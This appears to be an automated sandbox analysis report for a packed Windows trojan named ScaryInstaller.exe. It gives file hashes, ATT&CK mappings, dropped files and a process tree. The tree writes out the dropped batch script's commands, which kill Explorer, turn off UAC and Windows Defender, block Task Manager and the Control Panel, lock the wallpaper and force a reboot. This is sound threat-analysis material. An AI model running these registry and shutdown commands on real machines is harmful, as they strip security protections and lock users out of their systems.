5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164

Reason

Machine shutdown

General

Target

ScaryInstaller.exe
Size

21.5MB
MD5

ac9526ec75362b14410cf9a29806eff4
SHA1

ef7c1b7181a9dc4e0a1c6b3804923b58500c263d
SHA256

5ae89b053a9c8e4ad9664b6d893998f281f2864c0f625a536400624d4fbd0164
SHA512

29514a83a5bb78439ee8fb9d64b9e0885f4444fb7f02cefdee939984bb80f58493b406787c53f9a4bf521b2c03af4c3e3da4d5033eee8095b2ab0e753534e621
SSDEEP

393216:8c68zOv/h4ZPW+Fsx5QiaamSf8iqTCqcvgQYp6veX0N/9FRI9qo6xE:8j1hY++ViaamEhF5vvY2/VI9qK

Score

10^/10

evasion ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Disables Task Manager via registry modification
evasion
Executes dropped EXE 2 IoCs

Processes:

CreepScreen.exemelter.exe

pid process

2540 CreepScreen.exe
2536 melter.exe
Loads dropped DLL 4 IoCs

Processes:

cmd.exe

pid process

2516 cmd.exe
2516 cmd.exe
2516 cmd.exe
2516 cmd.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
2540	CreepScreen.exe
2536	melter.exe

pid	process
2516	cmd.exe
2516	cmd.exe
2516	cmd.exe
2516	cmd.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/3008-0-0x0000000000400000-0x0000000001DFD000-memory.dmp	upx
behavioral1/memory/3008-36-0x0000000000400000-0x0000000001DFD000-memory.dmp	upx
behavioral1/memory/3008-78-0x0000000000400000-0x0000000001DFD000-memory.dmp	upx

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

2692 timeout.exe
2752 timeout.exe
2424 timeout.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

2636 taskkill.exe
2440 taskkill.exe
2940 taskkill.exe
Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

1812 reg.exe
496 reg.exe
1568 reg.exe
Runs net.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

vlc.exe

pid process

2916 vlc.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

vlc.exe

pid process

2916 vlc.exe

pid	process
2692	timeout.exe
2752	timeout.exe
2424	timeout.exe

pid	process
2636	taskkill.exe
2440	taskkill.exe
2940	taskkill.exe

pid	process
1812	reg.exe
496	reg.exe
1568	reg.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exevlc.exeshutdown.exe

description	pid	process
Token: SeDebugPrivilege	2636	taskkill.exe
Token: SeDebugPrivilege	2440	taskkill.exe
Token: SeDebugPrivilege	2940	taskkill.exe
Token: 33	2916	vlc.exe
Token: SeIncBasePriorityPrivilege	2916	vlc.exe
Token: SeShutdownPrivilege	776	shutdown.exe
Token: SeRemoteShutdownPrivilege	776	shutdown.exe

Suspicious use of FindShellTrayWindow 34 IoCs

Processes:

vlc.exe

pid	process
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe
2916	vlc.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

CreepScreen.exevlc.exe

pid process

2540 CreepScreen.exe
2916 vlc.exe

pid	process
2540	CreepScreen.exe
2916	vlc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ScaryInstaller.execmd.exe

description	pid	process	target process
PID 3008 wrote to memory of 2516	3008	ScaryInstaller.exe	cmd.exe
PID 3008 wrote to memory of 2516	3008	ScaryInstaller.exe	cmd.exe
PID 3008 wrote to memory of 2516	3008	ScaryInstaller.exe	cmd.exe
PID 3008 wrote to memory of 2516	3008	ScaryInstaller.exe	cmd.exe
PID 2516 wrote to memory of 2636	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2636	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2636	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2636	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2540	2516	cmd.exe	CreepScreen.exe
PID 2516 wrote to memory of 2540	2516	cmd.exe	CreepScreen.exe
PID 2516 wrote to memory of 2540	2516	cmd.exe	CreepScreen.exe
PID 2516 wrote to memory of 2540	2516	cmd.exe	CreepScreen.exe
PID 2516 wrote to memory of 2752	2516	cmd.exe	timeout.exe
PID 2516 wrote to memory of 2752	2516	cmd.exe	timeout.exe
PID 2516 wrote to memory of 2752	2516	cmd.exe	timeout.exe
PID 2516 wrote to memory of 2752	2516	cmd.exe	timeout.exe
PID 2516 wrote to memory of 2536	2516	cmd.exe	melter.exe
PID 2516 wrote to memory of 2536	2516	cmd.exe	melter.exe
PID 2516 wrote to memory of 2536	2516	cmd.exe	melter.exe
PID 2516 wrote to memory of 2536	2516	cmd.exe	melter.exe
PID 2516 wrote to memory of 2424	2516	cmd.exe	timeout.exe
PID 2516 wrote to memory of 2424	2516	cmd.exe	timeout.exe
PID 2516 wrote to memory of 2424	2516	cmd.exe	timeout.exe
PID 2516 wrote to memory of 2424	2516	cmd.exe	timeout.exe
PID 2516 wrote to memory of 2440	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2440	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2440	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2440	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2940	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2940	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2940	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2940	2516	cmd.exe	taskkill.exe
PID 2516 wrote to memory of 2916	2516	cmd.exe	vlc.exe
PID 2516 wrote to memory of 2916	2516	cmd.exe	vlc.exe
PID 2516 wrote to memory of 2916	2516	cmd.exe	vlc.exe
PID 2516 wrote to memory of 2916	2516	cmd.exe	vlc.exe
PID 2516 wrote to memory of 2484	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 2484	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 2484	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 2484	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 800	2516	cmd.exe	rundll32.exe
PID 2516 wrote to memory of 800	2516	cmd.exe	rundll32.exe
PID 2516 wrote to memory of 800	2516	cmd.exe	rundll32.exe
PID 2516 wrote to memory of 800	2516	cmd.exe	rundll32.exe
PID 2516 wrote to memory of 800	2516	cmd.exe	rundll32.exe
PID 2516 wrote to memory of 800	2516	cmd.exe	rundll32.exe
PID 2516 wrote to memory of 800	2516	cmd.exe	rundll32.exe
PID 2516 wrote to memory of 1812	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 1812	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 1812	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 1812	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 496	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 496	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 496	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 496	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 1620	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 1620	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 1620	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 1620	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 1568	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 1568	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 1568	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 1568	2516	cmd.exe	reg.exe
PID 2516 wrote to memory of 2308	2516	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\ScaryInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\ScaryInstaller.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3008

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\29AF.tmp\creep.cmd" "
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2636

C:\Users\Admin\AppData\Local\Temp\29AF.tmp\CreepScreen.exe
CreepScreen.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2540

C:\Windows\SysWOW64\timeout.exe
timeout 5 /nobreak
3⤵
- Delays execution with timeout.exe
PID:2752

C:\Users\Admin\AppData\Local\Temp\29AF.tmp\melter.exe
melter.exe
3⤵
- Executes dropped EXE
PID:2536

C:\Windows\SysWOW64\timeout.exe
timeout 10 /nobreak
3⤵
- Delays execution with timeout.exe
PID:2424

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CreepScreen.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2440

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im melter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\29AF.tmp\scarr.mp4"
3⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2916

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
3⤵
- Sets desktop wallpaper using registry
PID:2484

C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
3⤵
PID:800

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:1812

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
- Modifies registry key
PID:496

C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:1620

C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
- Modifies registry key
PID:1568

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
3⤵
PID:2308

C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"IT'S TOO LATE!!!"
3⤵
PID:624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
4⤵
PID:1984

C:\Windows\SysWOW64\timeout.exe
timeout 8 /nobreak
3⤵
- Delays execution with timeout.exe
PID:2692

C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:776

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:892

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:2396

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Impair Defenses

1

T1562

Disable or Modify Tools

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Defacement

1

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\29AF.tmp\bg.bmp
Filesize
5.9MB

MD5
463e7914d89b7dd1bfbba5b89c57eace

SHA1
7f697f8880bcf0beed430d80487dd58b975073fa

SHA256
fd62ecf096773673d834f1ec598e0a3898a69c14bf159ba4e23b1caf5666923d

SHA512
a112d4b0fafaa273fcfa012cecb1aca93f6a352241064137ef8bfb0437f88683cec37f97cedce9cfc944228399e9e481e7be6a6f65b50d523014200974c87562

Download Submit
C:\Users\Admin\AppData\Local\Temp\29AF.tmp\creep.cmd
Filesize
1KB

MD5
e77d2ff29ca99c3902d43b447c4039e2

SHA1
2805268a8db128a7278239d82402c9db0a06e481

SHA256
1afa31c6764bdb1d9d7e6c61bf7a6f2607fbc5061e7a0e5a56004694a2fd6f4c

SHA512
580e3550c6751c58db5874eacde15aa80743625bf920d1191589c2aa7211896b378956dbe7070dcfe2f78a8028d92a8e6dceda8a8d2415b2600fc69f52833f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\29AF.tmp\melter.exe
Filesize
2KB

MD5
33b75bd8dbb430e95c70d0265eeb911f

SHA1
5e92b23a16bef33a1a0bf6c1a7ee332d04ceab83

SHA256
2f69f7eeab4c8c2574ef38ed1bdea531b6c549ef702f8de0d25c42dcc4a2ca12

SHA512
943d389bea8262c5c96f4ee6f228794333220ea8970bcc68ab99795d4efd24ebf24b2b9715557dfa2e46cfc3e7ab5adff51db8d41ef9eb10d04370ce428eb936

Download Submit
C:\Users\Admin\AppData\Local\Temp\29AF.tmp\mover.exe
Filesize
548KB

MD5
c1978e4080d1ec7e2edf49d6c9710045

SHA1
b6a87a32d80f6edf889e99fb47518e69435321ed

SHA256
c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8

SHA512
2de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e

Download Submit
C:\Users\Admin\AppData\Local\Temp\29AF.tmp\scarr.mp4
Filesize
19.0MB

MD5
a504846de42aa7e7b75541fa38987229

SHA1
4c8ba5768db2412d57071071f8573b83ecab0e2d

SHA256
a20d339977ab7af573867a254ca2aaee4bcb296fa57cd1d3f1e7ed1c5855dc89

SHA512
28b9f6a0783b82c4a28c52bc849a3886df7dac95be488253fc1ca5839600ac7ce79ef97f7da0a18d7474fe02748e7078bf4b823ced10c4dc0f8352fc7b1d7dea

Download Submit
\Users\Admin\AppData\Local\Temp\29AF.tmp\CreepScreen.exe
Filesize
128KB

MD5
4ab112b494b6c6762afb1be97cdc19f5

SHA1
eed9d960f86fb10da90d0bbca801aea021658f02

SHA256
ec778e79c7a3c88eed2a6931a9f188d209791f363fbe7eadf0842efdbfafee3e

SHA512
4f7a92834c576fdb55c3a5dc4990c4aa719083ce64ebbb70139d03ba485e7ae0d249afdc6c9810ddae3d106a0bdfc35b8fddb4fb40ad692f21c5c8ce3bbb1b49

Download Submit
memory/2916-92-0x000007FEFBAE0000-0x000007FEFBB01000-memory.dmp

Filesize
132KB

Download
memory/2916-95-0x000007FEFB5B0000-0x000007FEFB5C1000-memory.dmp

Filesize
68KB

Download
memory/2916-117-0x000007FEF94D0000-0x000007FEF9784000-memory.dmp

Filesize
2.7MB

Download
memory/2916-80-0x000007FEFBFF0000-0x000007FEFC024000-memory.dmp

Filesize
208KB

Download
memory/2916-79-0x000000013F670000-0x000000013F768000-memory.dmp

Filesize
992KB

Download
memory/2916-82-0x000007FEFBE60000-0x000007FEFBE78000-memory.dmp

Filesize
96KB

Download
memory/2916-83-0x000007FEFBE40000-0x000007FEFBE57000-memory.dmp

Filesize
92KB

Download
memory/2916-84-0x000007FEFBE20000-0x000007FEFBE31000-memory.dmp

Filesize
68KB

Download
memory/2916-81-0x000007FEF94D0000-0x000007FEF9784000-memory.dmp

Filesize
2.7MB

Download
memory/2916-85-0x000007FEFBE00000-0x000007FEFBE17000-memory.dmp

Filesize
92KB

Download
memory/2916-86-0x000007FEFBDE0000-0x000007FEFBDF1000-memory.dmp

Filesize
68KB

Download
memory/2916-87-0x000007FEFBDC0000-0x000007FEFBDDD000-memory.dmp

Filesize
116KB

Download
memory/2916-88-0x000007FEFBDA0000-0x000007FEFBDB1000-memory.dmp

Filesize
68KB

Download
memory/2916-90-0x000007FEFB600000-0x000007FEFB800000-memory.dmp

Filesize
2.0MB

Download
memory/2916-91-0x000007FEFBD60000-0x000007FEFBD9F000-memory.dmp

Filesize
252KB

Download
memory/2916-89-0x000007FEF4E30000-0x000007FEF5EDB000-memory.dmp

Filesize
16.7MB

Download
memory/2916-114-0x000007FEF7390000-0x000007FEF73C4000-memory.dmp

Filesize
208KB

Download
memory/2916-93-0x000007FEFBD40000-0x000007FEFBD58000-memory.dmp

Filesize
96KB

Download
memory/2916-94-0x000007FEFB5E0000-0x000007FEFB5F1000-memory.dmp

Filesize
68KB

Download
memory/2916-113-0x000007FEF7420000-0x000007FEF746E000-memory.dmp

Filesize
312KB

Download
memory/2916-96-0x000007FEFB590000-0x000007FEFB5A1000-memory.dmp

Filesize
68KB

Download
memory/2916-97-0x000007FEFB570000-0x000007FEFB58B000-memory.dmp

Filesize
108KB

Download
memory/2916-98-0x000007FEFB510000-0x000007FEFB521000-memory.dmp

Filesize
68KB

Download
memory/2916-99-0x000007FEFB4F0000-0x000007FEFB508000-memory.dmp

Filesize
96KB

Download
memory/2916-100-0x000007FEFB4C0000-0x000007FEFB4F0000-memory.dmp

Filesize
192KB

Download
memory/2916-101-0x000007FEFB450000-0x000007FEFB4B7000-memory.dmp

Filesize
412KB

Download
memory/2916-102-0x000007FEFABD0000-0x000007FEFAC3F000-memory.dmp

Filesize
444KB

Download
memory/2916-103-0x000007FEFB430000-0x000007FEFB441000-memory.dmp

Filesize
68KB

Download
memory/2916-104-0x000007FEFAB70000-0x000007FEFABC6000-memory.dmp

Filesize
344KB

Download
memory/2916-105-0x000007FEF9B20000-0x000007FEF9C98000-memory.dmp

Filesize
1.5MB

Download
memory/2916-106-0x000007FEFB410000-0x000007FEFB427000-memory.dmp

Filesize
92KB

Download
memory/2916-107-0x000007FEF9360000-0x000007FEF94D0000-memory.dmp

Filesize
1.4MB

Download
memory/2916-108-0x000007FEFB3F0000-0x000007FEFB402000-memory.dmp

Filesize
72KB

Download
memory/2916-109-0x000007FEFAD70000-0x000007FEFADB2000-memory.dmp

Filesize
264KB

Download
memory/2916-110-0x000007FEF90E0000-0x000007FEF90F5000-memory.dmp

Filesize
84KB

Download
memory/2916-111-0x000007FEF8B00000-0x000007FEF8B11000-memory.dmp

Filesize
68KB

Download
memory/2916-112-0x000007FEF7FA0000-0x000007FEF8021000-memory.dmp

Filesize
516KB

Download
memory/3008-36-0x0000000000400000-0x0000000001DFD000-memory.dmp

Filesize
26.0MB

Download
memory/3008-0-0x0000000000400000-0x0000000001DFD000-memory.dmp

Filesize
26.0MB

Download
memory/3008-78-0x0000000000400000-0x0000000001DFD000-memory.dmp

Filesize
26.0MB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads